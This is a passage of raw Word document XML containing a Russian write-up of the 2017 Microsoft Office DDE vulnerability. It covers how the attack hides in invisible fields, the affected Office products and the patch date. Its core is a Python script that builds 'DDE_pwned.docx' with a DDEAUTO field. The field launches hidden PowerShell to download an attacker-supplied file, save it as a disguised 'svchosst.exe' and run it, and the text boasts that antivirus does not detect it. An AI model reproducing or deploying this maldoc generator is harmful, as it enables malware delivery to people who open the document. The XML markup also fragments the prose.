          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ам вредоносный код, использующий механизм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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, располагается в полях документа,</w:t>
      </w:r>
      <w:r w:rsidR="000D72EA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> которые по умолчанию невидимы </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(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B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+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D72EA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9 включает отображение). </w:t>
      </w:r>
      <w:r w:rsidR="00285494" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Не детектируется антивирусами. </w:t>
      </w:r>
      <w:r w:rsidR="000D72EA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рактически все приложения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7EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> используют механизм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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA30D4" w:rsidRPr="00B97EE9" w:rsidRDefault="006E3A4F" w:rsidP="00DD1B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ая сторона атаки</w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - показ нескольких окон пользователю, при открытии зараженного документа. </w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00912973">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>К тому же,</w:t>
      </w:r>
      <w:r w:rsidR="00741066">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сам текст выполняемой команды отображается в окне</w:t>
      </w:r>
      <w:r w:rsidR="00DC0B57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что частично раскрывает наши планы</w:t>
      </w:r>
      <w:r w:rsidR="00DD1B65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Гораздо хуже то, что при появлении окон, в фокусе,</w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9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DD1B65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выбрана кнопка </w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97E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D1B65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пользователь, который будет </w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">просто нажимать </w:t>
      </w:r>
      <w:r w:rsidR="000A412D" w:rsidRPr="00B97EE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A412D" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, не будет подвержен атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD53BE" w:rsidRPr="00B97EE9" w:rsidRDefault="00047094">
      <w:pPr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>Список уязвимых продуктов Microsoft Office:</w:t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5280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00047094" w:rsidRPr="00047094" w:rsidTr="00047094">
        <w:trPr>
          <w:trHeight w:val="28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 Automation Services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Office Compatibility Pack Service Pack 3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Office Online Server 2016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Office Web Apps Server 2013 Service Pack 1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Office Word Viewer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Word 2016 (32-bit edition)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Word 2007 Service Pack 3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3 Service Pack 1 (64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0 Service Pack 2 (64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0 Service Pack 2 (64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0 Service Pack 2 (32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0 Service Pack 2 (32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3 Service Pack 1 (32-bit editions)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Word 2013 RT Service Pack 1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Word 2016 (64-bit edition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00047094" w:rsidRPr="00047094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rosoft SharePoint Enterprise Server 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00047094" w:rsidRPr="00194623" w:rsidTr="00047094">
        <w:trPr>
          <w:trHeight w:val="288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4" w:rsidRPr="00047094" w:rsidRDefault="00047094" w:rsidP="0004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0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 Office Web Apps Server 2010 Service Pack 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000D72EA" w:rsidRPr="00B97EE9" w:rsidRDefault="000D72EA" w:rsidP="000470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72EA" w:rsidRPr="00B97EE9" w:rsidRDefault="00047094" w:rsidP="000D7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A54C2" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">бновление, закрывающее уязвимость, было выпущенно </w:t>
      </w:r>
      <w:r w:rsidR="00190114" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10 октября 2017 года.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047094" w:rsidRPr="00B97EE9" w:rsidRDefault="000D72EA" w:rsidP="000D72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Характеристики программного обеспечения, используемые при тестировании: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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.7.1, </w:t>
      </w:r>
      <w:r w:rsidR="003740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74056" w:rsidRPr="00E673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405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374056" w:rsidRPr="00E673C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.3.0,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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidR="0034095B" w:rsidRPr="00B97EE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0D5AAA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64-</w:t>
      </w:r>
      <w:r w:rsidR="000D5AAA" w:rsidRPr="00B97EE9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4095B" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0034095B" w:rsidRPr="00B97EE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4095B" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0034095B" w:rsidRPr="00B97EE9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="000D5AAA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000D5AAA"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D5AAA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016 64-</w:t>
      </w:r>
      <w:r w:rsidR="000D5AAA" w:rsidRPr="00B97EE9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0D5AAA" w:rsidRPr="00B97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AAA"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0D5AAA" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.1.15063.674</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4E0F" w:rsidRPr="00B97EE9" w:rsidRDefault="006E4E0F" w:rsidP="000D72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4E0F" w:rsidRPr="00B97EE9" w:rsidRDefault="006E4E0F" w:rsidP="000D72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571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EE9" w:rsidRDefault="00571383" w:rsidP="00571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зные ссылки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97EE9" w:rsidRDefault="00571383" w:rsidP="005B6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ython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B97EE9" w:rsidRDefault="00003C58" w:rsidP="005B624D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B624D" w:rsidRPr="005B624D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://python-docx.readthedocs.io/en/latest/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="005B624D" w:rsidP="005B6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запуска программ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</w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="00003C58" w:rsidP="005B62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5B624D" w:rsidRPr="00B220D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indowsnotes.ru/powershell-2/zapusk-programmy-iz-powershell/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005B624D" w:rsidRPr="005B624D" w:rsidRDefault="005B624D" w:rsidP="005B6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использования имени такого способа, для создания поля сил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624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</w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="00003C58" w:rsidP="005B624D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B624D" w:rsidRPr="00B220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ython-openxml/python-docx/issues/31</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA0718" w:rsidRDefault="00EA0718" w:rsidP="005B62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0718">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://msdn.microsoft.com/en-us/library/aa213351(v=office.11).aspx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="005B624D" w:rsidP="005B6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о </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDEAUTO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="00003C58" w:rsidP="005B624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B624D" w:rsidRPr="00B220D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msdn.microsoft.com/en-us/library/ff531181(v=office.12).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005B624D" w:rsidRDefault="00EA0718" w:rsidP="005B6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о механизме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA0718" w:rsidRDefault="00003C58" w:rsidP="00EA071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14" w:anchor="_win32_Client.2c_.Server.2c_.and_Conversation" w:history="1">
        <w:r w:rsidR="00EA0718" w:rsidRPr="00B220D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msdn.microsoft.com/en-us/library/windows/desktop/ms648774(v=vs.85).aspx#_win32_Client.2c_.Server.2c_.and_Conversation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA0718" w:rsidRPr="00EA0718" w:rsidRDefault="00EA0718" w:rsidP="00EA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налогичной атаки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DDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, но в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</w:p>
    <w:p w:rsidR="00EA0718" w:rsidRDefault="00003C58" w:rsidP="00EA071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A0718" w:rsidRPr="00B220D5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://nakedsecurity.sophos.com/2017/10/22/office-dde-attack-works-in-outlook-too-heres-what-to-do/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA0718" w:rsidRDefault="00EA0718" w:rsidP="00EA07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</w:p>
    <w:p w:rsidR="00EA0718" w:rsidRDefault="00003C58" w:rsidP="00EA071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EA0718" w:rsidRPr="00B220D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powertheshell.com/bp_noprofile/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA0718" w:rsidRPr="00EA0718" w:rsidRDefault="00EA0718" w:rsidP="00EA071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3C58" w:rsidRDefault="00003C58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B76A4" w:rsidRDefault="008B76A4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73C7" w:rsidRPr="008B76A4" w:rsidRDefault="006E4E0F" w:rsidP="00E673C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B76A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>скрипта</w:t>
      </w:r>
      <w:r w:rsidRPr="008B76A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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8B76A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_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B76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E673C7" w:rsidRPr="00BF26D7" w:rsidRDefault="00E673C7" w:rsidP="00B61CB3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A1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"># ВНИМАНИЕ! Перед запуском, необходимо установить </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E673C7" w:rsidRPr="00EA1797" w:rsidRDefault="00E673C7" w:rsidP="00EA1797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1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># pip install python-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA1797">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007C7FC9" w:rsidRPr="00E673C7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># -*- coding: utf-8 -*-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import Document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x.oxml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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se_xml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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x.oxml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.n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nsdecls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rgparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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parser = 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rgparse.ArgumentParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ser.add_</w:t>
      </w:r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rgument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", type=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, help="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for downloading a malicious file"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ser.parse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_arg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document = </w:t>
      </w:r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ument(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paragraph =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ument.add_</w:t>
      </w:r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agraph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agraph._</w:t>
      </w:r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_xm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= '&lt;</w:t>
      </w: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w:fldSimple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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%s w:instr=" DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe 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;/k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NoP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ta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NonI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WindowStyle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Hidden (New-Object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ystem.Net.WebClient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wnloadFile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' + args.url + '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,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 %%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%%\\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vchosst.exe&amp;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);Start-Process -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WindowStyle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Hidden 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%%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%%\\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vchosst.exe&amp;apo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; "/&gt;'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_xm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_xm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nsdecls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'w'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Simple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arse_xm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_xml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.addnext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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fldSimple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B97E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7EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('DDE_pwned.docx')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97EE9" w:rsidRDefault="00B97EE9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3C58" w:rsidRDefault="00003C58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3C58" w:rsidRDefault="00003C58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3C58" w:rsidRPr="00B97EE9" w:rsidRDefault="00003C58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97EE9" w:rsidRPr="00B97EE9" w:rsidRDefault="00EA1797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ности</w:t>
      </w:r>
      <w:r w:rsidR="00B97EE9" w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> возникшие при написании скрипта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97EE9" w:rsidRPr="00B97EE9" w:rsidRDefault="00B97EE9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>Невозможность использования переменных $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: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97EE9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userprofile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, прямых путей к временной директории, для сохранения скачанного файла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97EE9" w:rsidRPr="00B97EE9" w:rsidRDefault="00B97EE9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Несмотря на то, что имя сохраняемого файла задано, как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svchosst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.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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, сохраняется оно как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Tempsvchosst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.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97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97EE9" w:rsidRPr="00B97EE9" w:rsidRDefault="00B97EE9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EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Возможно эти проблемы связанны с особенностью запуска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 xml:space="preserve">'а из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B97EE9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B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, а его</w:t>
      </w:r>
      <w:r w:rsidR="00B61CB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью механизма </w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97EE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4E0F" w:rsidRPr="00B97EE9" w:rsidRDefault="006E4E0F" w:rsidP="00EA1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E4E0F" w:rsidRPr="00B9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D5437"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E4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1C21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD00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94"/>
    <w:rsid w:val="00003C58"/>
    <w:rsid w:val="00047094"/>
    <w:rsid w:val="00095DCD"/>
    <w:rsid w:val="000A412D"/>
    <w:rsid w:val="000D2951"/>
    <w:rsid w:val="000D5AAA"/>
    <w:rsid w:val="000D72EA"/>
    <w:rsid w:val="00190114"/>
    <w:rsid w:val="00191D57"/>
    <w:rsid w:val="00194623"/>
    <w:rsid w:val="001A1DBC"/>
    <w:rsid w:val="001B1D19"/>
    <w:rsid w:val="002358D8"/>
    <w:rsid w:val="00285494"/>
    <w:rsid w:val="0034095B"/>
    <w:rsid w:val="00374056"/>
    <w:rsid w:val="003A5906"/>
    <w:rsid w:val="003D1F10"/>
    <w:rsid w:val="003E15A6"/>
    <w:rsid w:val="00436BDD"/>
    <w:rsid w:val="00462417"/>
    <w:rsid w:val="005159A6"/>
    <w:rsid w:val="005470F4"/>
    <w:rsid w:val="00571383"/>
    <w:rsid w:val="005B1FC6"/>
    <w:rsid w:val="005B624D"/>
    <w:rsid w:val="006C0251"/>
    <w:rsid w:val="006C3604"/>
    <w:rsid w:val="006D4D56"/>
    <w:rsid w:val="006E3A4F"/>
    <w:rsid w:val="006E4E0F"/>
    <w:rsid w:val="006E6514"/>
    <w:rsid w:val="007115A2"/>
    <w:rsid w:val="00741066"/>
    <w:rsid w:val="007C7FC9"/>
    <w:rsid w:val="007D2170"/>
    <w:rsid w:val="00851D00"/>
    <w:rsid w:val="008B76A4"/>
    <w:rsid w:val="00912973"/>
    <w:rsid w:val="00964D51"/>
    <w:rsid w:val="00A61315"/>
    <w:rsid w:val="00A744DB"/>
    <w:rsid w:val="00A80FCA"/>
    <w:rsid w:val="00AD53BE"/>
    <w:rsid w:val="00AD6CB8"/>
    <w:rsid w:val="00B43F25"/>
    <w:rsid w:val="00B61CB3"/>
    <w:rsid w:val="00B875CF"/>
    <w:rsid w:val="00B97EE9"/>
    <w:rsid w:val="00BF26D7"/>
    <w:rsid w:val="00D16230"/>
    <w:rsid w:val="00DC0B57"/>
    <w:rsid w:val="00DD1B65"/>
    <w:rsid w:val="00E07FF7"/>
    <w:rsid w:val="00E27BB6"/>
    <w:rsid w:val="00E417E1"/>
    <w:rsid w:val="00E673C7"/>
    <w:rsid w:val="00E86223"/>
    <w:rsid w:val="00EA0718"/>
    <w:rsid w:val="00EA1797"/>
    <w:rsid w:val="00EA54C2"/>
    <w:rsid w:val="00EF5788"/>
    <w:rsid w:val="00F15074"/>
    <w:rsid w:val="00F90CAC"/>
